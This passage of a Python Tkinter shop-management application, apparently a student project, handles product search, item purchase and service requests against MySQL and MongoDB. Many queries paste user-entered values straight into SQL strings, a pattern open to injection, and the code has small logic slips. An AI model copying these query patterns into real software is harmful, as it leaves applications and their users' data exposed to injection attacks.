collectionItem.find({\"$and\": and_query_arr})\n\n createTable(sql, selectedPrice)\n\n else:\n messagebox.askokcancel(\"Search Error\", \"No such product\")\n\n def createTable(items, selectedPrice):\n allItems = []\n global listFrame\n listFrame.destroy()\n listFrame = Frame(\n adminProductPage, highlightbackground=\"black\", highlightthickness=1\n )\n sql = \"\"\n categoryValues = []\n modelValues = []\n categoryModel = [\n \"LightsLight1\",\n \"LightsLight2\",\n \"LightsSmartHome1\",\n \"LocksSafe1\",\n \"LocksSafe2\",\n \"LocksSafe3\",\n \"LocksSmartHome1\",\n ]\n instockValues = [0, 0, 0, 0, 0, 0, 0]\n totalStocks = [0, 0, 0, 0, 0, 0, 0]\n\n for item in items:\n allItems.append(item)\n index = 0\n categoryModelPair = item[\"Category\"] + item[\"Model\"]\n\n index = categoryModel.index(categoryModelPair)\n\n if item[\"Category\"] not in categoryValues:\n categoryValues.append(item[\"Category\"])\n if item[\"Model\"] not in modelValues:\n modelValues.append(item[\"Model\"])\n totalStocks[index] = totalStocks[index] + 1\n if item[\"PurchaseStatus\"] == \"Unsold\":\n instockValues[index] = instockValues[index] + 1\n else:\n totalStocks[index] = totalStocks[index] + 1\n if item[\"PurchaseStatus\"] == \"Unsold\":\n instockValues[index] = instockValues[index] + 1\n\n # Test if there is value in category and model\n oneCat = False\n # Test if theres 2 catorgoires i.e user never select category\n twoCat = False\n try:\n numCat = len(categoryValues)\n if numCat == 2:\n twoCat = True\n oneCat = True\n except:\n print(\"No value on either category or model\")\n print(len(categoryValues))\n print(len(modelValues))\n\n if twoCat:\n\n if selectedPrice == \"\":\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Model\": modelValue},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n\n else:\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Model\": modelValue},\n {\"Price ($)\": {\"$lte\": selectedPrice}},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n\n elif oneCat:\n\n if selectedPrice == \"\":\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Category\": categoryValues[0]},\n {\"Model\": modelValue},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n else:\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Category\": categoryValues[0]},\n {\"Model\": modelValue},\n {\"Price ($)\": {\"$lte\": selectedPrice}},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n\n columnNames = (\n \"Category\",\n \"Model\",\n \"Price ($)\",\n \"Warranty (months)\",\n \"In Stock\",\n \"Cost\",\n \"Items Sold\")\n table = ttk.Treeview(listFrame, column=columnNames, show=\"headings\", height=10)\n for name in columnNames:\n table.heading(name, text=name, anchor=CENTER)\n table.column(name, anchor=CENTER, stretch=NO, width=150)\n\n for item in sql:\n categoryModelPair = item[\"Category\"] + item[\"Model\"]\n toInsert = (\n item[\"Category\"],\n item[\"Model\"],\n item[\"Price ($)\"],\n item[\"Warranty (months)\"],\n instockValues[categoryModel.index(categoryModelPair)],\n item[\"Cost ($)\"],\n totalStocks[categoryModel.index(categoryModelPair)]\n - instockValues[categoryModel.index(categoryModelPair)],\n )\n table.insert(\"\", \"end\", text=str(item), values=toInsert)\n\n table.place(relwidth=1, relheight=1)\n listFrame.place(relwidth=0.7, relheight=0.9, relx=0.3, rely=0.1)\n\n #Binding Click\n def clicking(e):\n selected = table.focus()\n theCategory = table.set(selected, 'Model')\n theModel = table.set(selected, 'Category')\n\n adminProductPage.destroy()\n adminItemPage(person, allItems, [theCategory, theModel])\n\n #Binding\n table.bind(\"\", clicking)\n\n\n def goHome():\n adminProductPage.destroy()\n adminHome(person)\n\n def resetDB():\n # SQL\n try:\n dbCursor = connection.cursor()\n sql = \"DROP DATABASE \" + \"oshes\"\n dbCursor.execute(sql)\n databaseCollection = dbCursor.fetchall()\n\n except Exception as e:\n print(\"Exeception occured:{}\".format(e))\n\n reimportDB()\n prepopulate_all()\n\n # MongoDB\n collectionItem.delete_many({})\n with open('items.json') as f:\n file_data = json.load(f)\n collectionItem.insert_many(file_data)\n\n collectionProduct.delete_many({})\n with open('products.json') as f:\n file_data2 = json.load(f)\n collectionProduct.insert_many(file_data2)\n setOld()\n root.destroy()\n\n # Combobox\n example = ttk.Combobox(searchFrame, values=[\"Search by...\", \"Category\", \"Model\"])\n example.current(0)\n example.place(relx=0.05, rely=0.70)\n\n priceValues = [\"\", \"50\", \"70\", \"100\", \"120\", \"200\"]\n priceField = ttk.Combobox(filterFrame, values=priceValues)\n priceField.place(relx=0.5, rely=0.2)\n\n colourValues = []\n colourValues.append(\"\")\n factoryValues = []\n factoryValues.append(\"\")\n yearValues = []\n yearValues.append(\"\")\n all = collectionItem.find()\n\n for item in all:\n if item[\"Color\"] not in colourValues:\n colourValues.append(item[\"Color\"])\n if item[\"Factory\"] not in factoryValues:\n factoryValues.append(item[\"Factory\"])\n if item[\"ProductionYear\"] not in yearValues:\n yearValues.append(item[\"ProductionYear\"])\n colourBox = ttk.Combobox(filterFrame, values=colourValues)\n factoryBox = ttk.Combobox(filterFrame, values=factoryValues)\n yearBox = ttk.Combobox(filterFrame, values=yearValues)\n\n colourBox.place(relx=0.5, rely=0.4)\n factoryBox.place(relx=0.5, rely=0.6)\n yearBox.place(relx=0.5, rely=0.8)\n\n # Checkboxes for Category\n lightVar = StringVar()\n locksVar = StringVar()\n\n lightBox = Checkbutton(\n categoryFrame, text=\"Lights\", variable=lightVar, onvalue=\"Lights\", offvalue=\"\"\n )\n locksBox = Checkbutton(\n categoryFrame, text=\"Locks\", variable=locksVar, onvalue=\"Locks\", offvalue=\"\"\n )\n\n lightBox.place(relx=0.1, rely=0.4)\n locksBox.place(relx=0.5, rely=0.4)\n\n # Checkboxes for Models\n light1Var = StringVar()\n light2Var = StringVar()\n safe1Var = StringVar()\n safe2Var = StringVar()\n safe3Var = StringVar()\n smartHome1Var = StringVar()\n\n light1Box = Checkbutton(\n modelFrame, text=\"Light 1\", variable=light1Var, onvalue=\"Light1\", offvalue=\"\"\n )\n light2Box = Checkbutton(\n modelFrame, text=\"Light 2\", variable=light2Var, onvalue=\"Light2\", offvalue=\"\"\n )\n safe1Box = Checkbutton(\n modelFrame, text=\"Safe 1\", variable=safe1Var, onvalue=\"Safe1\", offvalue=\"\"\n )\n safe2Box = Checkbutton(\n modelFrame, text=\"Safe 2\", variable=safe2Var, onvalue=\"Safe2\", offvalue=\"\"\n )\n safe3Box = Checkbutton(\n modelFrame, text=\"Safe 3\", variable=safe3Var, onvalue=\"Safe3\", offvalue=\"\"\n )\n smartHome1Box = Checkbutton(\n modelFrame,\n text=\"Smart Home 1\",\n variable=smartHome1Var,\n onvalue=\"SmartHome1\",\n offvalue=\"\",\n )\n\n light1Box.place(relx=0.1, rely=0.35)\n light2Box.place(relx=0.4, rely=0.35)\n safe1Box.place(relx=0.7, rely=0.35)\n safe2Box.place(relx=0.1, rely=0.6)\n safe3Box.place(relx=0.4, rely=0.6)\n smartHome1Box.place(relx=0.7, rely=0.6)\n\n # Buttons\n searchButton = Button(\n searchFrame,\n text=\"Search\",\n width=10,\n height=1,\n command=lambda: searchTings(),\n bg=\"green\",\n )\n\n homeButton = Button(\n searchFrame, text=\"Return to Home\", width=30, command=goHome, bg=\"red\"\n )\n searchButton.place(relx=0.75, rely=0.7)\n homeButton.place(relx=0.2, rely=0.9)\n dataResetButton = Button(\n searchFrame, text=\"Reset database\", width=30, bg=\"red\", command=resetDB\n )\n dataResetButton.place(relx=0.2, rely=0.8)\n\n # Initialise\n adminProductPage.place(relwidth=1, relheight=1)\n searchFrame.place(relwidth=0.3, relheight=0.95, relx=0, rely=0.05)\n listFrame.place(relwidth=0.7, relheight=0.9, relx=0.3, rely=0.1)\n categoryFrame.place(rely = 0.2, relx= 0.05, relwidth = 0.9, relheight = 0.1)\n modelFrame.place(rely = 0.35, relx=0.05, relwidth=0.9, relheight=0.25)\n filterFrame.place(relx = 0.05, rely = 0.02, relwidth = 0.9, relheight = 0.15)\n\n\n#################################################################################\n# 4. Item Information\n#################################################################################\ndef goToItem(person, id, admin=False):\n\n # Functions\n def getItemInfo(itemID):\n item = collectionItem.find({\"ItemID\": {\"$eq\": itemID}})\n item = item[0]\n return (\n item[\"Category\"],\n item[\"Color\"],\n item[\"Factory\"],\n item[\"PowerSupply\"],\n item[\"PurchaseStatus\"],\n item[\"ProductionYear\"],\n item[\"Model\"],\n item[\"ServiceStatus\"],\n )\n\n def getProductInfo(category, model):\n product = collectionProduct.find(\n {\"$and\": [{\"Category\": {\"$eq\": category}}, {\"Model\": {\"$eq\": model}}]}\n )\n product = product[0]\n return (\n product[\"Cost ($)\"],\n product[\"Price ($)\"],\n product[\"Warranty (months)\"],\n product[\"ProductID\"],\n )\n\n def getSimilarItems(category, model, admin):\n\n items = collectionItem.find(\n {\n \"$and\": [\n {\"Category\": {\"$eq\": category}},\n {\"Model\": {\"$eq\": model}},\n {\"PurchaseStatus\": {\"$eq\": \"Unsold\"}} if not admin else {},\n ]\n },\n {\n \"ItemID\": 1,\n \"Color\": 1,\n \"Factory\": 1,\n \"PowerSupply\": 1,\n \"ProductionYear\": 1,\n \"PurchaseStatus\": 1,\n },\n )\n\n return items\n\n def clearEntries():\n # clear entry boxes\n attrEntry0.delete(0, END)\n attrEntry1.delete(0, END)\n attrEntry2.delete(0, END)\n attrEntry3.delete(0, END)\n attrEntry4.delete(0, END)\n attrEntry5.delete(0, END)\n\n def select_record(e):\n # delete current entry boxes\n clearEntries()\n selected = table.focus()\n attrs = table.item(selected)[\"values\"]\n\n attrEntry0.insert(0, attrs[0])\n attrEntry1.insert(0, attrs[1])\n attrEntry2.insert(0, attrs[2])\n attrEntry3.insert(0, attrs[3])\n attrEntry4.insert(0, attrs[4])\n attrEntry5.insert(0, attrs[5])\n\n def goItem():\n try:\n itemID = str(attrEntry0.get())\n itemPage.destroy()\n goToItem(person, itemID, admin)\n except:\n goToItem(person, id, admin)\n messagebox.askokcancel(title=\"Error\", message=\"Invalid Item ID\")\n\n def buyItem():\n # UPDATES MYSQL\n numQuery = \"SELECT MAX(purchaseID) FROM Purchase\"\n if readQuery(connection, numQuery)[0][0] != None:\n purchaseID = str(int(readQuery(connection, numQuery)[0][0]) + 1)\n else:\n purchaseID = 0\n purchaseDate = datetime.now().strftime(\"%Y-%m-%d\")\n sql_query = \"INSERT INTO Purchase VALUES ('%s', '%s','%s'); \" % (\n purchaseID,\n purchaseDate,\n person_id,\n )\n executeQuery(connection, sql_query)\n temp = collectionItem.find_one({ \"ItemID\": id })\n productID = collectionProduct.find_one({\"Model\":temp[\"Model\"], \"Category\":temp[\"Category\"]})[\"ProductID\"]\n sql_query = \"INSERT INTO Item VALUES ('%s', '%s','%s', '%s', '%s','%s', '%s', %s, %s); \" % (\n id,\n color,\n factory,\n power_supply,\n production_year,\n model,\n service_status,\n productID,\n purchaseID,\n )\n executeQuery(connection, sql_query)\n\n # UPDATES MONGODB\n collectionItem.find_one_and_update(\n {\"ItemID\": id}, {\"$set\": {\"PurchaseStatus\": \"Sold\"}}\n )\n\n goToItem(person, id, admin)\n\n return messagebox.showinfo(title=\"success\", message=\"Update successful!\")\n\n def goHome():\n itemPage.destroy()\n if admin:\n adminHome(person)\n else:\n userHome(person)\n\n def refresh():\n itemPage.destroy()\n goToItem(person, id, admin)\n \n def back():\n itemPage.destroy()\n if admin:\n adminProducts(person)\n else:\n userProducts(person)\n\n def backMainte():\n itemPage.destroy()\n if admin:\n serviceManagement(person)\n else:\n requestManagement(person)\n\n person_id = person[0]\n (\n category,\n color,\n factory,\n power_supply,\n purchase_status,\n production_year,\n model,\n service_status,\n ) = getItemInfo(id)\n\n \n cost, price, warranty, productId = getProductInfo(category, model)\n\n # Frames\n itemPage = Frame(root)\n outerFrame1 = Frame(itemPage, bg=\"blue\")\n outerFrame2 = Frame(itemPage, bg=\"yellow\")\n outerTableFrame = Frame(outerFrame2)\n\n Frame1 = Frame(outerFrame1)\n Frame2 = Frame(outerFrame1)\n\n tableFrame = Frame(outerTableFrame)\n selectionFrame = LabelFrame(outerTableFrame, text=\"Record\")\n goItemFrame = Frame(outerFrame2)\n\n keyInfoFrame = Frame(Frame1, highlightbackground=\"black\", highlightthickness=1)\n\n purchaseFrame = Frame(Frame1, highlightbackground=\"black\", highlightthickness=1)\n\n infoFrame = LabelFrame(\n Frame2,\n text=f\"Item Information\",\n highlightbackground=\"black\",\n highlightthickness=1,\n )\n\n buttonsFrame = Frame(\n outerFrame1,\n highlightbackground=\"black\",\n highlightthickness=1,\n )\n\n # Labels\n bannerLabel = Label(\n itemPage,\n text=f\"Item #{id} : {category} / {model}\",\n bg=\"lightblue\",\n relief=SUNKEN,\n height=2,\n )\n \n if admin:\n bannerLabel = Label(\n itemPage,\n text=f\"Item #{id} : {category} / {model}\",\n bg=\"violet\",\n relief=SUNKEN,\n height=2,\n )\n\n similarItemsBannerLabel = Label(\n tableFrame,\n text=f\"Similar Items ({category} : {model})\",\n bg=\"yellow\",\n relief=SUNKEN,\n height=2,\n )\n\n idLabel = Label(keyInfoFrame, text=f\"Item ID:\", bg=\"lightblue\")\n categoryLabel = Label(keyInfoFrame, text=f\"Category:\", bg=\"lightblue\")\n modelLabel = Label(keyInfoFrame, text=f\"Model:\", bg=\"lightblue\")\n\n colorLabel = Label(infoFrame, text=f\"Color:\", bg=\"lightblue\")\n factoryLabel = Label(infoFrame, text=f\"Factory:\", bg=\"lightblue\")\n powerSupplyLabel = Label(infoFrame, text=f\"Power Supply:\", bg=\"lightblue\")\n\n productionYearLabel = Label(infoFrame, text=f\"Production Year:\", bg=\"lightblue\")\n\n warrantyLabel = Label(infoFrame, text=f\"Warranty:\", bg=\"lightblue\")\n\n if admin:\n costLabel = Label(infoFrame, text=f\"Cost:\", bg=\"lightblue\")\n\n serviceStatusLabel = Label(infoFrame, text=f\"Service Status:\", bg=\"lightblue\")\n\n # Table\n similarItems = getSimilarItems(category, model, admin)\n columnNames = (\n \"ID\",\n \"Color\",\n \"Factory\",\n \"Power Supply\",\n \"Production Year\",\n \"Purchase Status\",\n )\n tableScroll = Scrollbar(tableFrame)\n tableScroll.pack(side=RIGHT, fill=Y)\n table = ttk.Treeview(\n tableFrame,\n yscrollcommand=tableScroll.set,\n columns=columnNames,\n show=\"headings\",\n selectmode=\"extended\",\n )\n tableScroll.config(command=table.yview)\n col_width = table.winfo_width() // 6\n for name in columnNames:\n table.heading(name, text=name, anchor=CENTER)\n table.column(name, width=col_width)\n for item in similarItems:\n toInsert = (\n item[\"ItemID\"],\n item[\"Color\"],\n item[\"Factory\"],\n item[\"PowerSupply\"],\n item[\"ProductionYear\"],\n item[\"PurchaseStatus\"],\n )\n table.insert(\"\", \"end\", text=str(item), values=toInsert)\n\n # Event\n table.bind(\"\", select_record)\n\n # Entries\n attrLabel0 = Label(selectionFrame, text=\"ID\")\n attrLabel0.grid(row=0, column=0, padx=10, pady=10)\n attrEntry0 = Entry(selectionFrame)\n attrEntry0.grid(row=0, column=1, padx=10, pady=10)\n\n attrLabel1 = Label(selectionFrame, text=\"Color\")\n attrLabel1.grid(row=0, column=2, padx=10, pady=10)\n attrEntry1 = Entry(selectionFrame)\n attrEntry1.grid(row=0, column=3, padx=10, pady=10)\n\n attrLabel2 = Label(selectionFrame, text=\"Factory\")\n attrLabel2.grid(row=0, column=4, padx=10, pady=10)\n attrEntry2 = Entry(selectionFrame)\n attrEntry2.grid(row=0, column=5, padx=10, pady=10)\n\n attrLabel3 = Label(selectionFrame, text=\"Power Supply\")\n attrLabel3.grid(row=1, column=0, padx=10, pady=10)\n attrEntry3 = Entry(selectionFrame)\n attrEntry3.grid(row=1, column=1, padx=10, pady=10)\n\n attrLabel4 = Label(selectionFrame, text=\"Production Year\")\n attrLabel4.grid(row=1, column=2, padx=10, pady=10)\n attrEntry4 = Entry(selectionFrame)\n attrEntry4.grid(row=1, column=3, padx=10, pady=10)\n\n attrLabel5 = Label(selectionFrame, text=\"Purchase Status\")\n attrLabel5.grid(row=1, column=4, padx=10, pady=10)\n attrEntry5 = Entry(selectionFrame)\n attrEntry5.grid(row=1, column=5, padx=10, pady=10)\n\n # Fields\n idValue = Label(keyInfoFrame, text=f\"{id}\", bg=\"lightblue\")\n categoryValue = Label(keyInfoFrame, text=f\"{category}\", bg=\"lightblue\")\n modelValue = Label(keyInfoFrame, text=f\"{model}\", bg=\"lightblue\")\n\n colorValue = Label(infoFrame, text=f\"{color}\", bg=\"lightblue\")\n factoryValue = Label(infoFrame, text=f\"{factory}\", bg=\"lightblue\")\n powerSupplyValue = Label(infoFrame, text=f\"{power_supply}\", bg=\"lightblue\")\n\n productionYearValue = Label(infoFrame, text=f\"{production_year}\", bg=\"lightblue\")\n\n warrantyValue = Label(infoFrame, text=f\"{warranty} month(s)\", bg=\"lightblue\")\n\n if admin:\n costValue = Label(infoFrame, text=f\"${cost}\", bg=\"lightblue\")\n serviceStatusText = 'N/A' if service_status == \"\" else service_status\n\n serviceStatusValue = Label(infoFrame, text=f\"{serviceStatusText}\", bg=\"lightblue\")\n\n # Buttons\n if not admin and purchase_status == \"Unsold\":\n buyButton = Button(\n purchaseFrame,\n text=f\"Buy (${price})\",\n command=buyItem,\n bg=\"green\",\n font=(None, 16),\n fg=\"#ffffff\",\n )\n\n elif purchase_status == \"Unsold\":\n buyButton = Button(\n purchaseFrame,\n text=f\"Unsold (${price})\",\n state=DISABLED,\n bg=\"orange\",\n font=(None, 16),\n fg=\"#ffffff\",\n )\n\n else: # sold\n buyButton = Button(\n purchaseFrame,\n text=f\"Sold (${price})\",\n state=DISABLED,\n bg=\"red\",\n font=(None, 16),\n fg=\"#ffffff\",\n )\n\n homeButton = Button(\n buttonsFrame,\n text=\"Home\",\n command=goHome,\n bg=\"blue\",\n font=(None, 16),\n fg=\"#ffffff\",\n )\n refreshButton = Button(\n buttonsFrame,\n text=\"Refresh\",\n command=refresh,\n bg=\"green\",\n font=(None, 16),\n fg=\"#ffffff\",\n )\n\n goItemButton = Button(\n goItemFrame,\n text=\"Go to Item\",\n command=goItem,\n bg=\"green\",\n font=(None, 16),\n fg=\"#ffffff\",\n )\n \n backButton = Button(\n outerFrame1,\n text=\"Products Page\",\n command=back, bg=\"white\",\n font=12\n )\n\n maintenanceButton = Button(\n outerFrame1,\n text=\"Maintenance Page\",\n command=backMainte, bg=\"white\",\n font=12\n )\n\n # Initialise\n itemPage.place(relwidth=1, relheight=1)\n outerFrame1.place(relx=0, rely=0.05, relwidth=0.4, relheight=0.95)\n outerFrame2.place(relx=0.4, rely=0.05, relwidth=0.6, relheight=0.95)\n\n bannerLabel.place(relheight=0.05, relwidth=1)\n Frame1.place(relx=0.05, rely=0.5, anchor=W)\n Frame2.place(relx=0.95, rely=0.5, anchor=E)\n\n outerTableFrame.pack(fill=\"x\")\n tableFrame.pack(fill=\"x\")\n selectionFrame.pack(fill=\"x\", expand=\"yes\")\n goItemFrame.pack(fill=\"y\", pady=20)\n\n maintenanceButton.place(relx = 0.5, rely = 0.85)\n backButton.place(relx = 0.5, rely = 0.9)\n buttonsFrame.place(relx=0.05, rely=0.95, anchor=SW)\n homeButton.grid(row=0, column=0, padx=10, pady=10)\n refreshButton.grid(row=0, column=1, padx=(0, 10), pady=10)\n goItemButton.pack()\n keyInfoFrame.pack(fill=X)\n purchaseFrame.pack(fill=X)\n infoFrame.pack(fill=BOTH)\n similarItemsBannerLabel.pack(fill=\"x\")\n table.pack(fill=\"x\")\n\n idLabel.grid(row=0, column=0, sticky=W, padx=20, pady=20)\n idValue.grid(row=0, column=1, padx=20, pady=20)\n categoryLabel.grid(row=1, column=0, sticky=W, padx=20, pady=(0, 20))\n categoryValue.grid(row=1, column=1, padx=20, pady=(0, 20))\n modelLabel.grid(row=2, column=0, sticky=W, padx=20, pady=(0, 20))\n modelValue.grid(row=2, column=1, padx=20, pady=20)\n idLabel.grid(row=0, column=0, sticky=W)\n\n colorLabel.grid(row=0, column=0, sticky=W, padx=20, pady=10)\n colorValue.grid(row=0, column=1, padx=20, pady=10)\n factoryLabel.grid(row=1, column=0, sticky=W, padx=20, pady=10)\n factoryValue.grid(row=1, column=1, padx=20, pady=10)\n powerSupplyLabel.grid(row=2, column=0, sticky=W, padx=20, pady=10)\n powerSupplyValue.grid(row=2, column=1, padx=20, pady=10)\n productionYearLabel.grid(row=3, column=0, sticky=W, padx=20, pady=10)\n productionYearValue.grid(row=3, column=1, padx=20, pady=10)\n warrantyLabel.grid(row=4, column=0, sticky=W, padx=20, pady=10)\n warrantyValue.grid(row=4, column=1, padx=20, pady=10)\n\n if admin:\n costLabel.grid(row=5, column=0, sticky=W, padx=20, pady=10)\n costValue.grid(row=5, column=1, padx=20, pady=10)\n serviceStatusLabel.grid(row=6, column=0, sticky=W, padx=20, pady=10)\n serviceStatusValue.grid(row=6, column=1, padx=20, pady=10)\n\n buyButton.pack(fill=X, padx=10, pady=10)\n\n\n#################################################################################\n# 5. Request Management Page (User)\n#################################################################################\ndef requestManagement(person):\n global requestListFrame\n\n # Frames\n requestPage = Frame(root)\n requestListFrame = Frame(\n requestPage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n\n selectionFrame = LabelFrame(requestPage, text=\"Record\")\n buttonsFrame = LabelFrame(\n requestPage,\n text=\"Options\",\n highlightbackground=\"black\",\n highlightthickness=1,\n bg=\"grey\",\n )\n requestFormFrame = LabelFrame(\n requestPage,\n text=\"New Request\",\n highlightbackground=\"black\",\n highlightthickness=1,\n )\n\n # Labels\n requestLabel = Label(\n requestPage, text=f\"Request Management\", bg=\"lightblue\", relief=SUNKEN\n )\n\n requestLabel.place(relwidth = 1, relheight = 0.05)\n\n # Entries\n attrLabel0 = Label(selectionFrame, text=\"ID\")\n attrLabel0.grid(row=0, column=0, padx=10, pady=10)\n attrEntry0 = Entry(selectionFrame)\n attrEntry0.grid(row=0, column=1, padx=10, pady=10)\n\n attrLabel1 = Label(selectionFrame, text=\"Fee ($)\")\n attrLabel1.grid(row=0, column=2, padx=10, pady=10)\n attrEntry1 = Entry(selectionFrame)\n attrEntry1.grid(row=0, column=3, padx=10, pady=10)\n\n attrLabel2 = Label(selectionFrame, text=\"Date\")\n attrLabel2.grid(row=0, column=4, padx=10, pady=10)\n attrEntry2 = Entry(selectionFrame)\n attrEntry2.grid(row=0, column=5, padx=10, pady=10)\n\n attrLabel3 = Label(selectionFrame, text=\"Status\")\n attrLabel3.grid(row=1, column=0, padx=10, pady=10)\n attrEntry3 = Entry(selectionFrame)\n attrEntry3.grid(row=1, column=1, padx=10, pady=10)\n\n attrLabel4 = Label(selectionFrame, text=\"Item ID\")\n attrLabel4.grid(row=1, column=2, padx=10, pady=10)\n attrEntry4 = Entry(selectionFrame)\n attrEntry4.grid(row=1, column=3, padx=10, pady=10)\n\n formLabel0 = Label(requestFormFrame, text=\"Item ID\")\n formLabel0.grid(row=0, column=0, padx=10, pady=10)\n formEntry0 = Entry(requestFormFrame)\n formEntry0.grid(row=0, column=1, padx=10, pady=10)\n\n # Variables\n userID = person[0]\n\n # Helpers\n\n def displayTable():\n requests = getUserRequests(userID)\n createTable(requests)\n\n def createTable(requests):\n global requestListFrame\n requestListFrame.destroy()\n requestListFrame = Frame(\n requestPage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n requestListFrame.place(relx = 0.05, rely = 0.4, relwidth = 0.9, relheight = 0.55)\n\n columnNames = (\"ID\", \"Fee ($)\", \"Date\", \"Status\", \"Item ID\")\n tableScroll = Scrollbar(requestListFrame)\n tableScroll.pack(side=RIGHT, fill=Y)\n table = ttk.Treeview(\n requestListFrame,\n yscrollcommand=tableScroll.set,\n column=columnNames,\n show=\"headings\",\n selectmode=\"extended\",\n )\n table.place(relwidth = 1, relheight = 1)\n tableScroll.config(command=table.yview)\n for name in columnNames:\n table.heading(name, text=name, anchor=CENTER)\n if requests:\n for r in requests:\n toInsert = (r[0], r[1], r[2], r[3], int(r[4]))\n table.insert(\"\", \"end\", text=str(r), values=toInsert)\n\n # Function\n def select_record(e):\n # delete current entry boxes\n clearEntries()\n selected = table.focus()\n attrs = table.item(selected)[\"values\"]\n\n attrEntry0.insert(0, attrs[0])\n attrEntry1.insert(0, attrs[1])\n attrEntry2.insert(0, attrs[2])\n attrEntry3.insert(0, attrs[3])\n attrEntry4.insert(0, attrs[4])\n # Event\n table.bind(\"\", select_record)\n\n def goHome():\n requestPage.destroy()\n userHome(person)\n\n def getUserRequests(userID):\n query_string = f\"SELECT requestID, requestFee, requestDate, requestStatus, itemID FROM Request WHERE customerID = {userID}\"\n return readQuery(connection, query_string)\n\n def clearEntries():\n # clear entry boxes\n attrEntry0.delete(0, END)\n attrEntry1.delete(0, END)\n attrEntry2.delete(0, END)\n attrEntry3.delete(0, END)\n attrEntry4.delete(0, END)\n\n def makePayment():\n try:\n requestID = attrEntry0.get()\n requestFee = attrEntry1.get()\n requestStatus = attrEntry3.get()\n itemID = attrEntry4.get()\n if requestStatus == \"Submitted and Waiting for payment\" and float(requestFee) > 0:\n response = messagebox.askokcancel(\"Request payment\",\n message=f\"Request Fee: ${requestFee}. Proceed to payment?\"\n )\n if response:\n date_attr = date.today().strftime('%Y-%m-%d')\n query_string_1 = f\"INSERT INTO Payment VALUES({requestID},'{date_attr}',requestFee)\"\n\n query_string_2 = f\"UPDATE Request SET requestStatus='In progress' WHERE requestID = {requestID}\"\n executeQuery(connection, query_string_1)\n executeQuery(connection, query_string_2)\n\n collectionItem.find_one_and_update({\"ItemID\":{\"$eq\":itemID}}, {\n \"$set\":{\"ServiceStatus\": \"Waiting for approval\"}\n })\n \n clearEntries()\n displayTable()\n\n else:\n return messagebox.showerror(title=\"Error\", message=\"Payment not needed\")\n except:\n return messagebox.showerror(title=\"Error\", message=\"An error has occurred\")\n\n def cancelRequest():\n try:\n requestID = attrEntry0.get()\n requestStatus = attrEntry3.get()\n itemID = attrEntry4.get()\n if requestStatus != \"Approved\" and requestStatus != \"Canceled\":\n response = messagebox.askokcancel(\n \"Cancel Request\",\n message=f\"Are you sure you want to cancel request '{requestID}'?\",\n )\n\n if response:\n query_string_1 = f\"UPDATE Request SET requestStatus='Canceled' WHERE requestID = {requestID}\"\n executeQuery(connection, query_string_1)\n\n query_string_2 = f\"UPDATE Item SET serviceStatus='' WHERE itemID = {itemID}\"\n executeQuery(connection, query_string_2)\n\n collectionItem.find_one_and_update({\"ItemID\":{\"$eq\":itemID}}, {\n \"$set\":{\"ServiceStatus\": \"\"}\n })\n\n clearEntries()\n displayTable()\n else:\n return messagebox.showerror(\n title=\"Error\", message=\"Request cannot be canceled\"\n )\n except:\n return messagebox.showerror(title=\"Error\", message=\"An error has occurred\")\n\n def viewItem():\n itemID = attrEntry4.get()\n return goToItem(person,itemID)\n\n def getRequestItemID():\n try:\n itemID = formEntry0.get()\n return itemID\n except:\n return messagebox.showerror(\n title=\"Error\", message=\"Invalid input/data type\"\n )\n\n def submitForm():\n itemID = getRequestItemID()\n requestForm(itemID, person)\n displayTable()\n \n\n # Buttons\n displayButton = Button(\n buttonsFrame, text=\"Refresh Table\", command=displayTable, bg=\"white\"\n )\n displayButton.grid(row=0, column=0, padx=10, pady=10)\n\n homeButton = Button(buttonsFrame, text=\"Return to Home\", command=goHome, bg=\"blue\")\n homeButton.grid(row=0, column=1, padx=10, pady=10)\n\n viewItemButton = Button(buttonsFrame, text=\"View Item\", command=viewItem, bg=\"blue\")\n viewItemButton.grid(row=0, column=2, padx=10, pady=10)\n\n clearEntryButton = Button(\n buttonsFrame, text=\"Clear Entry\", command=clearEntries, bg=\"blue\"\n )\n clearEntryButton.grid(row=0, column=3, padx=10, pady=10)\n\n cancelRequestButton = Button(\n buttonsFrame, text=\"Cancel request\", command=cancelRequest, bg=\"red\"\n )\n cancelRequestButton.grid(row=0, column=4, padx=10, pady=10)\n\n requestPaymentButton = Button(\n buttonsFrame, text=\"Make Payment\", command=makePayment, bg=\"green\"\n )\n requestPaymentButton.grid(row=0, column=5, padx=10, pady=10)\n\n requestFormSubmitButton = Button(\n requestFormFrame, text=\"Submit\", command=submitForm, bg=\"green\"\n )\n requestFormSubmitButton.grid(row=0, column=2, padx=10, pady=10)\n\n # Inventory Table\n def getInventoryRow(purchaseID):\n query = f\"SELECT itemID, productID FROM Item WHERE purchaseID = {purchaseID}\"\n res = readQuery(connection, query)[0]\n itemID, productID = int(res[0]),int(res[1])\n query_1 = f\"SELECT category, model FROM Product WHERE productID = {productID}\"\n res_1 = readQuery(connection, query_1)[0]\n category, model = res_1\n\n requiresPayment = requestRequiresPaymentValidation(itemID)\n fee = getRequestFee(itemID) if requiresPayment else 0\n\n return (itemID,category,model,fee)\n \n def clearFormEntry():\n formEntry0.delete(0, END)\n\n def select_record(e):\n # delete current entry boxes\n clearFormEntry()\n selected = myInventoryTable.focus()\n attrs = myInventoryTable.item(selected)[\"values\"]\n\n formEntry0.insert(0, attrs[0])\n\n\n inventoryFrame = Frame(requestPage, highlightbackground = 'black', highlightthickness = 1)\n inventoryLabel = Label(inventoryFrame, text = \"Your Items\", relief = SUNKEN, bg = \"orange\")\n inventoryLabel.place(relwidth = 1, relheight = 0.1)\n detailNames = ['Item ID', 'Category', 'Model', 'Service Fee']\n myInventoryTable = ttk.Treeview(inventoryFrame, column=detailNames, show=\"headings\", height=5)\n for name in detailNames:\n myInventoryTable.heading(name, text=name, anchor=CENTER)\n myInventoryTable.column(name, anchor=CENTER, stretch=NO, width=150)\n test_query = \"SELECT * FROM Purchase WHERE customerID = '%s' \" % (person[0])\n results = readQuery(connection, test_query)\n if len(results) != 0:\n for ele in results:\n tup = 